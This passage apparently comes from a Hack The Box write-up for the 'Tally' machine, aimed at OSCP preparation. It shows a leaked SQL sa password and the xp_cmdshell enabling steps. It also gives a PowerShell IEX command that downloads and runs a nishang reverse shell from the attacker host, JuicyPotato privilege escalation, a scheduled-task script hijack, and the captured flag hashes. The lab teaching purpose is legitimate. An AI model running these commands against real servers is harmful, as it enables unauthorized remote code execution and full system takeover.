running strings on tester.exe will also list the database creds in its output
strings tester.exe
images/1728-2.png
images/1728-3.png



DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
images/1728-4.png

sqsh interactive database shell

images/1713-1.png
We'll be able to preform remote code execution on the SQL server we found by connecting to it via sqsh and issuing commands within it

connect with
sqsh -S 10.10.10.59 -U sa -P “GWE3V65#6KFH93@4GWTG2G”
where -S specifies server
-U specifies user
-P specifies pass
images/1713-2.png

xp_cmdshell does not exist

xp_cmdshell 'whoami;'
go
images/1714-1.png

when we try to run ‘whoami’ we get a response from the server saying the xp_cmdshell component is turned off, so we'll have to change the settings which enable xp_cmdshell to execute

reconfigure

to do this, we'll need to use the EXEC SP_CONFIGURE command

EXEC SP_CONFIGURE ‘xp_cmdshell’, 1
images/1715-1.png

we get a server response saying that either xp_cmdshell doesn't exist or it is an advanced option feature,

EXEC SP_CONFIGURE 'show advanced options', 1
EXEC SP_CONFIGURE ‘xp_cmdshell’, 1
reconfigure
go

images/1715-2.png

now we can toggle the database to use xp_cmdshell to run commands
images/1715-3.png

xp_cmdshell 'whoami'

the sqsh shell is stubborn to put it lightly, so you have to be thorough with each statement you input, you see I tried to cut corners enabling advanced options and xp_cmdshell simultaneously but ran into errors,
its easier to do each EXEC statement one at a time, but don't be surprised when the settings revert after a short period of time

EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go

reconfigure
go

EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go

reconfigure
go

xp_cmdshell 'whoami'
go

images/1716-1.png

images/1716-2.png
the sql database runs as user sarah

powershell IEX revshell

now that we have proof that code execution works on this machine and know our victim is a windows machine, we'll have tally's sql server download and execute a nishang powershell images/1727-1.png that will call a reverse shell back to our attack machine

First, move a nishang reverse shell to our working directory (don't forget to add the reverse shell call at the bottom of the script)
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.62 -Port 9001
images/1727-2.png

and spin up an http server
images/1727-3.png

now go back to sqsh, renable the advanced options and cmdshell, and download our file with a powershell's IEX command
images/1727-4.png

xp_cmdshell "powershell.exe IEX(new-object net.webclient).downloadstring('http://10.10.14.62/rev.ps1')"
images/1727-5.png

set up a listener on the designated port our reverse shell is coded to connect to and
we have our foothold!
images/1727-6.png

privesc w/ juicy potato

For windows machine priv esc, it is always a good idea to see what kind of privileges our owned user has, it may narrow down easy to use priv-esc exploits right on the spot without needing to run a hardy enumeration script like winPEAS

whoami /priv
images/1718-1.png
SeImpersonatePrivilege is Enabled!

Which means this box is most likely vulnerable to the very common and very effective juicy potato exploit

juicy potato

A quick rundown on juicy potato is that you need a batch script that will download a nishang powershell calling back to our machine on a different port number images/1720-1.png and run it along with the juicy potato exploit itself

batch script calling back to our nishang rev shell is shell.bat, which we can write locally
images/1720-2.png
our juicy potato executable is jp.exe download it here



Next lets download juicy potato and a simple batch script file to sarah's Download directory using powershell's downloadfile command (make sure our http server is still up as well)

powershell.exe (new-object net.webclient).downloadfile('http://10.10.14.62/shell.bat', 'C:\Users\Sarah\Downloads\shell.bat')
images/1720-3.png
powershell.exe (new-object net.webclient).downloadfile('http://10.10.14.62/jp.exe', 'C:\Users\Sarah\Downloads\jp.exe')
images/1720-4.png

verify our downloads were written to Sarah's Downloads directory
images/1720-5.png

now we're ready to run juicy potato from our victim
./jp.exe -t * -p shell.bat -l 9001
images/1720-6.png
exploit runs fine with default CLSID


and we're root!
images/1720-7.png

priv esc w/ scheduled task

The intended priv esc route is right on Sarah's Desktop
images/1721-1.png



SPBestWarmUp.ps1

images/1722-1.png
images/1722-2.pngimages/1722-3.png
images/1722-4.png

according to the calendar trigger in SPBestWarmUp.xml, every hour images/1722-5.png the administrator images/1722-6.png runs SPBestWarmUp.ps1 images/1722-7.png

since we have permission to write to sarah's desktop folder, we can rewrite SPBestWarmUp.ps1 to download and execute our reverse shell and run it as root
images/1722-8.png
images/1722-9.png

reverse shell

wait until the scheduled tasks runs and we're root!
images/1725-1.png

user/root

images/1719-1.png
be72362e8dffeca2b42406d5d1c74bb1

images/1719-2.png
608bb707348105911c8991108e523eda

Lessons Learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1717-1.png